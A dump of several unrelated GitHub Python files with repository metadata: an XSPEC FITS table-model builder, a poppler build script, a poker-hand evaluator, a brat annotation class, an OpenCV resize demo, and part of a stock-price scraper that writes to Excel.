INPUT --------------------\n\n if (os.path.isfile(outfile) and not clobber):\n raise NameError('Output file ' + outfile +\n ' exists and clobber set to false\\n')\n\n userdict = read_userparams(userparfile)\n \n # Convert userdict['value'] into a list of tuples; one tuple\n # for each model parameter\n\n # value_not_padded: used in get_paramval to calculate array with\n # combinations of model parameters\n idx = 0\n value_not_padded = []\n for item in userdict['numbvals']:\n value_not_padded.append(tuple(userdict['value'][idx:idx+item]))\n idx += item\n\n # value_padded: format required for col10 of the fits file\n value_padded = []\n maxnum = max(userdict['numbvals'])\n for val in value_not_padded:\n if (len(val) != maxnum):\n n = maxnum - len(val)\n value_padded.append(val + (0.,)*n)\n else:\n value_padded.append(val)\n\n # model energy grid (bin edges!)\n energy = np.loadtxt(specfile)[:,0] # energy in keV\n energ_lo = energy[:-1]\n energ_hi = energy[1:]\n\n paramval = get_paramval(value_not_padded)\n\n # list of tuples with spectra\n input_spectra = read_input_spectra(specfile, userdict['numbvals'])\n\n# ----------- END ---------------------------------\n\n # initialize fits file by creating user parameters extension\n\n col1 = fits.Column(name='NAME', format='12A',\n array=userdict['name'])\n col2 = fits.Column(name='METHOD', format='J',\n array=userdict['method'])\n col3 = fits.Column(name='INITIAL', format='E',\n array=userdict['initial'])\n col4 = fits.Column(name='DELTA', format='E',\n array=userdict['delta'])\n col5 = fits.Column(name='MINIMUM', format='E',\n array=userdict['minimum'])\n col6 = fits.Column(name='BOTTOM', format='E',\n array=userdict['bottom'])\n col7 = fits.Column(name='TOP', format='E',\n array=userdict['top'])\n col8 = fits.Column(name='MAXIMUM', format='E',\n array=userdict['maximum'])\n col9 = fits.Column(name='NUMBVALS', format='J',\n array=userdict['numbvals'])\n col10 = fits.Column(name='VALUE',\n format=np.str(np.max(userdict['numbvals']))+'E',\n array=value_padded)\n\n cols = fits.ColDefs([col1, col2, col3, col4, col5, col6, col7, col8,\n col9, col10])\n\n tbhdu = fits.BinTableHDU.from_columns(cols)\n\n # update header of user parameters extension\n\n nintparm = len(userdict['numbvals'])\n \n tbhdr = tbhdu.header\n\n tbhdr.set('EXTNAME', 'PARAMETERS',\n 'name of this binary table extension')\n tbhdr.set('HDUCLASS', 'OGIP',\n 'format conforms to OGIP standard')\n tbhdr.set('HDUCLAS1', 'XSPEC TABLE MODEL',\n 'model spectra for XSPEC')\n tbhdr.set('HDUCLAS2', 'PARAMETERS',\n 'extension containing parameter info')\n tbhdr.set('HDUVERS1', '1.0.0',\n 'version of format')\n tbhdr.set('NINTPARM', nintparm,\n 'Number of interpolation parameters')\n tbhdr.set('NADDPARM', 0,\n 'Number of additional parameters')\n\n if (os.path.isfile('tmp_tabmod.fits')):\n os.remove('tmp_tabmod.fits')\n\n tbhdu.writeto('tmp_tabmod.fits')\n\n # update primary header\n\n hdulist = fits.open('tmp_tabmod.fits')\n\n prihdr = hdulist[0].header\n prihdr['bitpix'] = 16\n prihdr.set('modlname', modelname, 'model name')\n prihdr.set('modlunit', 'photons/cm^2/s', 'model units')\n prihdr.set('redshift', True,\n 'If true then redshift will be included as a par')\n prihdr.set('addmodel', userdict['addmodel'],\n 'If true then this is an additive table model')\n prihdr.set('hduclass', 'OGIP',\n 'format conforms to OGIP standard')\n prihdr.set('hduclas1', 'XSPEC TABLE MODEL',\n 'model spectra for XSPEC')\n prihdr.set('hduvers1', '1.0.0', 'version of format')\n\n if (os.path.isfile(outfile)):\n os.remove(outfile)\n\n hdulist.writeto(outfile)\n \n hdulist.close()\n os.remove('tmp_tabmod.fits')\n \n # append extension energies and update its header\n\n col1 = fits.Column(name='ENERG_LO', format='E', array=energ_lo,\n unit='keV')\n col2 = fits.Column(name='ENERG_HI', format='E', array=energ_hi,\n unit='keV')\n\n cols = fits.ColDefs([col1, col2])\n\n tbhdu_energies = fits.BinTableHDU.from_columns(cols)\n\n hdr = tbhdu_energies.header\n hdr.set('EXTNAME', 'ENERGIES',\n 'name of this binary table extension')\n hdr.set('HDUCLASS', 'OGIP',\n 'format conforms to OGIP standard')\n hdr.set('HDUCLAS1', 'XSPEC TABLE MODEL',\n 'model spectra for XSPEC')\n hdr.set('HDUCLAS2', 'ENERGIES',\n 'extension containing energy bins info')\n hdr.set('HDUVERS1', '1.0.0', 'version of format')\n\n fits.append(outfile, tbhdu_energies.data, hdr)\n\n # append extension spectra and update its header\n\n col1 = fits.Column(name='PARAMVAL',\n format=np.str(nintparm)+'E', array=paramval)\n col2 = fits.Column(name='INTPSPEC',\n format=np.str(len(energ_lo))+'E',\n array=input_spectra, unit='photons/cm^2/s')\n\n cols = fits.ColDefs([col1, col2])\n\n tbhdu_spectra = fits.BinTableHDU.from_columns(cols)\n\n hdr = tbhdu_spectra.header\n hdr.set('EXTNAME', 'SPECTRA',\n 'name of this binary table extension')\n hdr.set('HDUCLASS', 'OGIP',\n 'format conforms to OGIP standard')\n hdr.set('HDUCLAS1', 'XSPEC TABLE MODEL',\n 'model spectra for XSPEC')\n hdr.set('HDUCLAS2', 'MODEL SPECTRA',\n 'extension containing model spectra')\n hdr.set('HDUVERS1', '1.0.0', 'version of format')\n\n fits.append(outfile, tbhdu_spectra.data, hdr)\n \n return\n\n\ndef read_userparams(fname):\n# Read model parameters from the file\n#\n# :rtype: dictionary, required keyword : value\n# :param fname: name of the file containing required keywords and values\n\n # Build a dictonary with user input\n \n with open(fname, 'r') as f:\n # ignore empty lines\n lines = [ l for l in f.readlines() if l.strip() ]\n\n expected_no_lines = 11\n\n if (len(lines)!= expected_no_lines):\n raise NameError(fname + ': expected ' +\n np.str(expected_no_lines) + ' lines, but ' +\n np.str(len(lines)) + ' lines found\\n')\n\n lines_split = []\n for l in lines:\n separate = l.rstrip().split()\n if (len(separate)<2):\n raise NameError(fname + ': cannot split line, ' + l + '\\n')\n lines_split.append(separate)\n\n # Recover items that will be the keys and check if all provided\n\n keys_required = ['addmodel', 'name', 'method', 'initial',\n 'delta', 'minimum', 'bottom', 'top',\n 'maximum', 'numbvals', 'value']\n keys = []\n for item in lines_split:\n keys.append(item[0].lower())\n\n if not (set(keys) == set(keys_required)):\n raise NameError(fname + ': missing entry, required keys: ',\n keys_required)\n\n userdict = {}\n for item in lines_split:\n if ('numbval' in item[0].lower()):\n userdict[item[0].lower()] = [ int(float(i))\n for i in item[1:] ]\n elif ('addmodel' in item[0].lower()):\n userdict[item[0].lower()] = bool(item[1])\n elif ('name' in item[0].lower()) or ('unit' in item[0].lower()):\n userdict[item[0].lower()] = item[1:]\n else:\n userdict[item[0].lower()] = [ float(i) for i in item[1:] ]\n\n if ( len(userdict['value']) != np.sum(userdict['numbvals']) ):\n raise NameError(fname +\n ': numbvals and value entries do not match\\n')\n\n return userdict\n\n\ndef get_paramval(arrays):\n# Find combinations of model paramaters corresponding to the input\n# spectra, needed for extension spectra\n#\n# :rtype: list of tuples, each tuple contains a combination of model\n# parameters corresponding to one of the input grid spectrum.\n# :param arrays: list of tuples, each tuple contains grid values of\n# model parameters, not padded with 0\n#\n arrays = [np.asarray(a) for a in arrays]\n shape = (len(x) for x in arrays)\n\n tmp = np.indices(shape, dtype=int)\n ix = tmp.reshape(len(arrays), -1).T\n out = tmp.reshape(len(arrays), -1).T.astype('float')\n \n for n, arr in enumerate(arrays):\n out[:, n] = arrays[n][ix[:, n]]\n\n param_combinations = []\n for item in out:\n param_combinations.append(tuple(item))\n \n return param_combinations\n\n\ndef read_input_spectra(fname, numbvals):\n# Read grid of model spectra from the file\n#\n# :rtype: list of tuples containing model spectra.\n#\n# :param fname: name of the file containing the grid of model spectra.\n# :param numbvals: list with total grid number of model parameters.\n \n d = np.loadtxt(fname)\n parameter_combinations = np.prod(numbvals)\n numspectra = len(d.T)-1\n # spectra in columns, 1st column is energy grid, skip it\n if ( numspectra != parameter_combinations ):\n raise NameError(fname + ': No. of spectra ' +\n np.str(numspectra) +\n ', different from declared param combinations '\n + np.str(parameter_combinations) + '\\n')\n input_spectra = []\n for i in range( len(d.T)-1 ):\n # d[:-1] - match no. of energy bins;\n # T[1:] - skip the 1st column with energy vector\n input_spectra.append(tuple(d[:-1].T[1:][i]))\n\n return input_spectra\n\n\n\n# ------------- miscellaneous -----------\n\n'''\n \ndef generate_spectra():\n# Tool to generate a grid of test spectra and test parameter file\n\n energy = np.linspace(0.5, 10., 30) # adjust to generate\n par1 = np.linspace(1., 3., 5) # parameter 1\n par2 = np.linspace(2., 50., 9) # parameter 2\n\n # Uncomment the following 7 lines, enter your model expression\n #spec = [energy]\n #for p1 in par1:\n # for p2 in par2:\n # tmp = < model expression >\n # spec.append(tmp)\n #\n #np.savetxt('specfile_test.txt', np.array(spec).T, fmt='%10.4f' )\n\n f = open('userparams_test.txt', 'w+')\n\n f.write('addmodel True\\n')\n f.write('name par1 par2\\n')\n f.write('method 0. 0.\\n')\n f.write('top ' + np.str(par1[-1]) + ' ' + np.str(par2[-1]) + '\\n')\n f.write('maximum ' + np.str(par1[-1]) + ' ' + np.str(par2[-1]) +\n '\\n')\n f.write('bottom ' + np.str(par1[0]) + ' ' + np.str(par2[0]) + '\\n')\n f.write('minimum ' + np.str(par1[0]) + ' ' + np.str(par2[0]) + '\\n')\n f.write('initial ' + np.str(par1.mean()) + ' ' +\n np.str(par2.mean()) + '\\n')\n # update the definition of delta is required\n f.write('delta ' + np.str( (par1[1:] - par1[:-1]).min()/5. ) + ' ' +\n np.str( (par2[1:] - par2[:-1]).min()/5. ) + '\\n')\n f.write('numbvals ' + np.str(len(par1)) + ' ' + np.str(len(par2)) +\n '\\n')\n\n par1vals = ''\n for p1 in par1:\n par1vals += np.str(p1) + ' '\n\n par2vals = ''\n for p2 in par2:\n par2vals += np.str(p2) + ' '\n\n f.write('value ' + par1vals + par2vals + '\\n')\n\n f.close()\n\n return\n\n'''\n\n\n","repo_name":"malgosias/2015-12-16-code-sample-3","sub_path":"tabmod.py","file_name":"tabmod.py","file_ext":"py","file_size_in_byte":12735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4391274669","text":"from __future__ import print_function\n\nimport sys\nfrom distutils.core import setup, Extension\n\ntry:\n from Cython.Build import cythonize\n\nexcept ImportError:\n print('You need to install cython first - sudo pip install cython', file=sys.stderr)\n sys.exit(1)\n\npoppler_ext = Extension('poppler', ['poppler.pyx'], language='c++',\n extra_compile_args=[],\n include_dirs=[\n \"/usr/include/poppler\",\n ],\n libraries=['poppler'])\nsetup(name='poppler',\n version='0.2',\n ext_modules=cythonize(poppler_ext))\n","repo_name":"oclay1st/Alexandria","sub_path":"backend/alexandria/modules/utils/parsers/pdf/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23963090676","text":"#https://codereview.stackexchange.com/questions/225119/project-euler-54-poker-hands-in-python\r\n#Thanks to SylvainD for the below code: git profile link: https://codereview.stackexchange.com/users/9452/sylvaind\r\n\r\nimport collections\r\nimport os\r\n\r\n\r\nclass Card:\r\n \"\"\"Card object (value and suit).\"\"\"\r\n CARD_VALUES = {\r\n '2': 2,\r\n '3': 3,\r\n '4': 4,\r\n '5': 5,\r\n '6': 6,\r\n '7': 7,\r\n '8': 8,\r\n '9': 9,\r\n 'T': 10,\r\n 'J': 11,\r\n 'Q': 12,\r\n 'K': 13,\r\n 'A': 14\r\n }\r\n\r\n def __init__(self, value, suit):\r\n self.value = value\r\n self.suit = suit\r\n\r\n @classmethod\r\n def from_string(cls, card):\r\n value, suit = card\r\n return cls(value, suit)\r\n\r\n def __str__(self):\r\n return str(self.value) + self.suit\r\n\r\n def __repr__(self):\r\n return self.__class__.__name__ + \"(\" + self.value + \", \" + self.suit + \")\"\r\n\r\n def evaluate(self):\r\n return Card.CARD_VALUES[self.value]\r\n\r\n\r\nclass Hand:\r\n \"\"\"Hand object (iterable of NB_CARDS cards).\"\"\"\r\n NB_CARDS = 5\r\n\r\n def __init__(self, cards):\r\n assert len(cards) == Hand.NB_CARDS\r\n self.cards = cards\r\n\r\n @classmethod\r\n def from_string(cls, string):\r\n cards = [Card.from_string(chunk) for chunk in string.split()]\r\n return cls(cards[:Hand.NB_CARDS]), cls(cards[Hand.NB_CARDS:])\r\n\r\n def __str__(self):\r\n return \"-\".join(str(c) for c in self.cards)\r\n\r\n def __repr__(self):\r\n return self.__class__.__name__ + \"(\" + repr(self.cards) + \")\"\r\n\r\n def evaluate(self):\r\n \"\"\"Return an arbitrarly formed tuple that can be used to\r\n sort hands using lexicographic order. First element is an\r\n integer describing the type of hand. Other values are added\r\n to be able to differentiate hands.\r\n\r\n Integers used:\r\n 1 High Card: Highest value card.\r\n 2 One Pair: Two cards of the same value.\r\n 3 Two Pairs: Two different pairs.\r\n 4 Three of a Kind: Three cards of the same value.\r\n 5 Straight: All cards are consecutive values.\r\n 6 Flush: All cards of the same suit.\r\n 7 Full House: Three of a kind and a pair.\r\n 8 Four of a Kind: Four cards of the same value.\r\n 9 Straight Flush: All cards are consecutive values of same suit.\r\n 9 Royal Flush: Ten, Jack, Queen, King, Ace, in same suit.\r\n \"\"\"\r\n values = sorted((c.evaluate() for c in self.cards), reverse=True)\r\n count = collections.Counter(values)\r\n mc, mc2 = count.most_common(2)\r\n mc_val, mc_nb = mc\r\n mc2_val, mc2_nb = mc2\r\n if mc_nb == 4:\r\n return (8, mc_val, values)\r\n elif mc_nb == 3:\r\n if mc2_nb == 2:\r\n return (7, mc_val, mc2_val, values)\r\n else:\r\n return (4, mc_val, values)\r\n elif mc_nb == 2:\r\n if mc2_nb == 2:\r\n return (3, sorted((mc_val, mc2_val)), values)\r\n else:\r\n return (2, mc_val, values)\r\n else:\r\n assert mc_nb == 1\r\n is_flush = len(set(c.suit for c in self.cards)) == 1\r\n delta = values[0] - values[-1]\r\n is_straight = delta == Hand.NB_CARDS - 1\r\n if is_straight:\r\n return (9 if is_flush else 5, values)\r\n else:\r\n return (6 if is_flush else 1, values)\r\n\r\n def __gt__(self, other): # Note: other magic methods should be defined as well\r\n return self.evaluate() > other.evaluate()\r\n\r\ndef euler54(f='p054_poker.txt'):\r\n \"\"\"Solution for problem 54.\"\"\"\r\n resource_folder = ''\r\n res = [] #Winning Lines\r\n res_ = [] #Losing Lines\r\n\r\n with open(os.path.join(resource_folder, f)) as file_:\r\n contents = file_.read().splitlines()\r\n file_.seek(0)\r\n for i in range(len(contents)):\r\n hand1, hand2 = Hand.from_string(contents[i])\r\n if hand1 > hand2:\r\n if contents[i][-1] == '\\n':\r\n res.append((contents[i][:-1], i))\r\n else:\r\n res.append((contents[i], i))\r\n \r\n else:\r\n if contents[i][-1] == '\\n':\r\n res_.append((contents[i][:-1], i))\r\n else:\r\n res_.append((contents[i], i))\r\n # print(i)\r\n return res, res_\r\n","repo_name":"Vivojay/Poker-CLI","sub_path":"compare_hands.py","file_name":"compare_hands.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42346101363","text":"from itertools import chain\nfrom lxml import etree\nfrom bratreader.event import Event\n\n\nclass AnnotatedDocument(object):\n \"\"\"Represent a document in a Brat Corpus.\"\"\"\n\n def __init__(self, key, sentences, text):\n \"\"\"\n Create a brat document.\n\n :param key: (string) The key of the document.\n Generally the name of the file without the extension\n (e.g. \"022.ann\" becomes 022)\n :param sentences: A list of dictionaries containing words.\n Represents the text of the review on a word-by-word basis.\n :return: None\n \"\"\"\n self.key = key\n\n self.sentences = sentences\n annotations = [chain.from_iterable([w.annotations for w in x.words])\n for x in sentences]\n self.annotations = list(chain.from_iterable(annotations))\n\n events = []\n eID = 0\n for idx in range(len(self.annotations)):\n annT = self.annotations[idx]\n sent = self.sentences[annT.words[0].sentkey]\n line = sent.line\n b, e = annT.spans[0]\n b, e = b-sent.start, e-sent.start\n if (annT.type == 'E'):\n #print('\\neT: \\t' + annT.label +'\\t'+ annT.repr +'\\t'+ line[b:e] +'\\t', [b, e])\n args = list()\n args_spans = list()\n args_labels = list()\n for idx_arg in range(len(annT.args)):\n arg = annT.args[idx_arg]\n #print(int(arg), len(self.annotations))\n annArg = self.annotations[int(arg)-1]\n ba, ea = annArg.realspan\n ba, ea = ba-sent.start, ea-sent.start# the args are in the same line with trigger!!\n args.append(annArg.repr)\n args_spans.append([ba,ea])\n args_labels.append(annArg.label)\n #print('eA' + str(idx_arg)+ ':\\t'+ annArg.label +'\\t'+ annArg.repr +'\\t'+ line[ba:ea] +'\\t', (ba, ea))\n events.append(Event(eID, line, annT.repr, [b, e], annT.label, args, args_spans, args_labels))\n eID = eID + 1\n self.events = events\n\n self.text = text\n\n def __repr__(self):\n \"\"\"Representation of the AnnotatedDocument.\"\"\"\n temp_ann = 'AnnotatedDocument:'\n # elements in sentences\n temp_ann = temp_ann + '\\n\\nkey:\\n' + str(self.key)\n temp_ann = temp_ann + '\\n\\ntext:\\n' + self.text\n temp_ann = temp_ann + '\\n\\nAnnotations:'\n ind = 0\n for ann in self.annotations:\n temp_ann = temp_ann + '\\nann[' + str(ind) + ']:' + str(ann)\n ind = ind + 1\n temp_ann = temp_ann + '\\n\\nEvents:'\n ind = 0\n for event in self.events:\n temp_ann = temp_ann + '\\nevent[' + str(ind) + ']:' + str(event)\n ind = ind + 1\n temp_ann = temp_ann + '\\n\\nSentences:'\n ind = 0\n for sent in self.sentences:\n temp_ann = temp_ann + '\\nsent[' + str(ind) + ']:' + str(sent)\n ind = ind + 1\n return \"{0}\\n\".format(temp_ann)\n\n\n def getlabelinspan(self, start, end):\n \"\"\"\n Retrieve all labels in the specified character span.\n\n :param start: The start index in characters.\n :param end: The end index in characters.\n :return a list of labels that fall inside the span.\n \"\"\"\n return [list(ann.labels.keys())[0] for ann in self.annotations if\n (ann.spans[0][0] <= start < ann.spans[-1][1])\n or (ann.spans[0][0] < end <= ann.spans[-1][1])\n or (start < ann.spans[0][0] < end and start < ann.spans[-1][1] < end)]\n\n\n\n def export_xml(self, pathtofile):\n \"\"\"\n Export the current document to an XML file at the specified location.\n\n :param pathtofile: The path where the .XML file needs to be saved.\n :return: None\n \"\"\"\n document = etree.Element(\"document\", source=self.key)\n\n sentences = etree.Element(\"sentences\")\n for s in self.sentences:\n\n sentence = etree.Element(\"sentence\", id=\"s.{0}\".format(s.key),\n start=str(s.start),\n end=str(s.end))\n\n for w in s.words:\n\n word = etree.Element(\"word\",\n start=str(w.start),\n end=str(w.end),\n id=\"s.{0}.w.{1}\".format(w.sentkey, w.key))\n word.text = w.form\n sentence.append(word)\n\n sentences.append(sentence)\n\n document.append(sentences)\n\n annotations = etree.Element(\"annotations\")\n\n for v in self.annotations:\n\n annotations.append(etree.Element(\"annotation\",\n id=str(\"ann{0}\".format(v.id))))\n ann = annotations.getchildren()[-1]\n\n ann.set(\"words\", u\" \".join([\"s.{0}.w.{1}\".format(w.sentkey, w.key)\n for w in v.words]))\n ann.set(\"repr\", v.repr)\n ann.set(\"spans\", u\",\".join([\"|\".join([str(y) for y in x])\n for x in v.spans]))\n\n for label, valency in v.labels.items():\n ann.set(str(label), \"|\".join(valency))\n\n for linktype, linked in v.links.items():\n\n linked = u\" \".join([\"ann{0}\".format(link.id) for link in linked])\n ann.set(str(\"link.{0}\".format(linktype)), linked)\n\n document.append(annotations)\n\n with open(pathtofile, 'wb') as f:\n etree.ElementTree(document).write(f, encoding=\"utf-8\", xml_declaration=True, pretty_print=True)\n","repo_name":"WePDLA/Delta","sub_path":"brat/bratreader/annotateddocument.py","file_name":"annotateddocument.py","file_ext":"py","file_size_in_byte":5724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23286932191","text":"import cv2 as cv\n\ndef rescaleFrame(frame,scale = 0.75):\n #images,videos and live video\n width = int(frame.shape[1] * scale)\n height = int(frame.shape[0] * scale)\n\n dimensions = (width,height)\n\n return cv.resize(frame,dimensions,interpolation=cv.INTER_AREA)\n\ndef change_res(width,height):\n #it will change for live video only\n capture.set(3,width)\n capture.set(4,height)\n\n#reading videos\ncapture = cv.VideoCapture('videos/video1.mp4')\nf = 1\nwhile True:\n #Getting the frame\n isTrue, frame = capture.read()\n #cv.imshow('Video',frame)\n #Getting a rescaled frame\n new_frame = rescaleFrame(frame,f)\n f = f+0.001\n cv.imshow('small video',new_frame)\n #When d is pressed the video exits\n if cv.waitKey(20) & 0xFF == ord('d'):\n break\ncapture.release()\ncv.destroyAllWindows()\n\n","repo_name":"DeVcB13d/OpenCV_Tut","sub_path":"2_Resize.py","file_name":"2_Resize.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15864221511","text":"#!/usr/bin/env python3\nimport eel\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport datetime\nimport time\nfrom datetime import date\n\n\n# Инициализация приложения при помощи библиотеки eel\neel.init(\"web\")\n\n# User-Agent, чтобы сайт не заблокировал доступ, думая, что это робот\nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'}\n\n# Страницы, с которых будет браться информация\nPromotions_Tesla = 'https://ru.investing.com/equities/tesla-motors'\nPromotions_Nissan = 'https://ru.investing.com/equities/nissan-motor-co.,-ltd.'\nPromotions_AMD = 'https://www.investing.com/equities/adv-micro-device'\nPromotions_Intel = 'https://ru.investing.com/equities/intel-corp'\nPromotions_Apple = 'https://www.investing.com/equities/apple-computer-inc'\nPromotions_IBM = 'https://www.investing.com/equities/ibm'\nPromotions_Microsoft = 'https://www.investing.com/equities/microsoft-corp'\nPromotions_Yandex = 'https://www.investing.com/equities/yandex'\nPromotions_Google = 'https://ru.investing.com/equities/google-inc'\nPromotions_Facebook = 'https://www.investing.com/equities/facebook-inc'\nPromotions_GM = 'https://ru.investing.com/equities/gen-motors'\nPromotions_Ford = 'https://ru.investing.com/equities/ford-motor-co'\nPromotions_Daimler = 'https://ru.investing.com/equities/daimler'\nPromotions_EA = 'https://ru.investing.com/equities/electronic-arts-inc'\nPromotions_Huawei = 'https://www.investing.com/equities/huawei-culture'\n# Параметры сбора данных, запись их в переменные\nparcer = 'html.parser'\ntype = \"span\" # По какому элементу искать\nklasse = \"class\" # По какому классу искать\n\n\n# Раздел с IT-компаниями\n@eel.expose # При нажатии кнопки в приложении, JavaScript вызывает функцию тут, в Python\ndef check_AMD():\n full_page = requests.get(Promotions_AMD, headers=headers) # При помощи библиотеки requests делается запрос на сайт\n soup = BeautifulSoup(full_page.content, parcer) # При помощи библиотеки BeautifulSoup парсится страница\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-8274-last\"}) # Поиск значения по указанным критериям\n output = convert[0].text # Это значение конвертируется\n return output # Идет возвращение полученного значения\n\n# И так по аналогии\n@eel.expose\ndef check_Intel():\n full_page = requests.get(Promotions_Intel, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-251-last\"})\n output = convert[0].text\n return output\n\n@eel.expose\ndef check_Apple():\n full_page = requests.get(Promotions_Apple, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-6408-last\"})\n output = convert[0].text\n print(output)\n return output\n\n@eel.expose\ndef check_IBM():\n full_page = requests.get(Promotions_IBM, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-8082-last\"})\n output = convert[0].text\n return output\n\n@eel.expose\ndef check_Microsoft():\n full_page = requests.get(Promotions_Microsoft, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-252-last\"})\n output = convert[0].text\n return output\n\n@eel.expose\ndef check_Google():\n full_page = requests.get(Promotions_Google, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-6369-last\"})\n output = convert[0].text.replace(\".\", \"\").replace(\",\", \".\")\n return output\n\n@eel.expose\ndef check_Facebook():\n full_page = requests.get(Promotions_Facebook, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-26490-last\"})\n output = convert[0].text\n return output\n\n@eel.expose\ndef check_EA():\n full_page = requests.get(Promotions_EA, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-6472-last\"})\n output = convert[0].text\n return output\n\n@eel.expose\ndef check_Yandex():\n full_page = requests.get(Promotions_Yandex, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-13999-last\"})\n output = convert[0].text\n return output\n\n@eel.expose\ndef check_Huawei():\n full_page = requests.get(Promotions_Huawei, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-944369-last\"})\n output = convert[0].text\n return output\n\n# Тестирование получение исторических значений акций\n@eel.expose\ndef check_gap_Apple():\n History_Apple = 'https://ru.investing.com/equities/apple-computer-inc-historical-data'\n full_page = requests.get(History_Apple, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_price = soup.findAll(\"td\", {\"class\": \"greenFont\"})\n for total in range(0, 20, 2):\n price = convert_price[total].text\n print(price)\n\n# Раздел с автопроизводителями\n@eel.expose\ndef check_Tesla():\n full_page = requests.get(Promotions_Tesla, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-13994-last\"})\n output = convert[0].text.replace(\".\", \"\").replace(\",\", \".\")\n return output\n\n@eel.expose\ndef check_Nissan():\n full_page = requests.get(Promotions_Nissan, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-44127-last\"})\n output = convert[0].text\n return output\n\n@eel.expose\ndef check_Ford():\n full_page = requests.get(Promotions_Ford, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-255-last\"})\n output = convert[0].text\n return output\n\n\n# Упаковка в Excel-файл через библиотеку Pandas\n# Функция с автопроизводителями\n@eel.expose\ndef start_Pandas_Auto():\n # Текст, который используется в процессе работы\n progress_bar = 'Progress: '\n packing = 'Packing into file...'\n sheet_name = 'Данные рынка на '\n prom_now = \"Текущая стоимость акций \"\n prom_day_max = 'Дневной максимум '\n prom_day_min = 'Дневной минимум '\n\n print(progress_bar + '1/5') # Счетчик прогесса\n full_page = requests.get(Promotions_Tesla, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_tesla = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-13994-last\"})\n convert_min_tesla = soup.findAll(\"span\", {\"class\": \"inlineblock pid-13994-low\"})\n convert_max_tesla = soup.findAll(\"span\", {\"class\": \"inlineblock pid-13994-high\"})\n time.sleep(1)\n\n print(progress_bar + '2/5')\n full_page = requests.get(Promotions_Nissan, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_nissan = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-44127-last\"})\n convert_min_nissan = soup.findAll(\"span\", {\"class\": \"inlineblock pid-44127-low\"})\n convert_max_nissan = soup.findAll(\"span\", {\"class\": \"inlineblock pid-44127-high\"})\n time.sleep(1)\n\n print(progress_bar + '3/5')\n full_page = requests.get(Promotions_GM, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_gm = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-239-last\"})\n convert_min_gm = soup.findAll(\"span\", {\"class\": \"inlineblock pid-239-low\"})\n convert_max_gm = soup.findAll(\"span\", {\"class\": \"inlineblock pid-239-high\"})\n time.sleep(1)\n\n print(progress_bar + '4/5')\n full_page = requests.get(Promotions_Ford, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_ford = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-255-last\"})\n convert_min_ford = soup.findAll(\"span\", {\"class\": \"inlineblock pid-255-low\"})\n convert_max_ford = soup.findAll(\"span\", {\"class\": \"inlineblock pid-255-high\"})\n time.sleep(1)\n\n print(progress_bar + '5/5')\n full_page = requests.get(Promotions_Daimler, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_daimler = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-355-last\"})\n convert_min_daimler = soup.findAll(\"span\", {\"class\": \"inlineblock pid-355-low\"})\n convert_max_daimler = soup.findAll(\"span\", {\"class\": \"inlineblock pid-355-high\"})\n time.sleep(1)\n\n hms = datetime.datetime.today() # Дата и время\n print(hms.hour, hms.minute, hms.second)\n time_flow = hms.hour, hms.minute, hms.second # Форматирование в формат времени\n print(packing)\n # Шаблон данных\n data = [\n [prom_now + str(\"Tesla\"), convert_tesla[0].text], # Текущая стоимость акций + актуальное значение\n [prom_day_min, convert_min_tesla[0].text], # Дневной минимум\n [prom_day_max, convert_max_tesla[0].text], # Дневной максимум\n [\" \", \" \"], # Отступ\n [prom_now + str(\"Nissan\"), convert_nissan[0].text],\n [prom_day_min, convert_min_nissan[0].text],\n [prom_day_max, convert_max_nissan[0].text],\n [\" \", \" \"],\n [prom_now + str(\"General Motors\"), convert_gm[0].text],\n 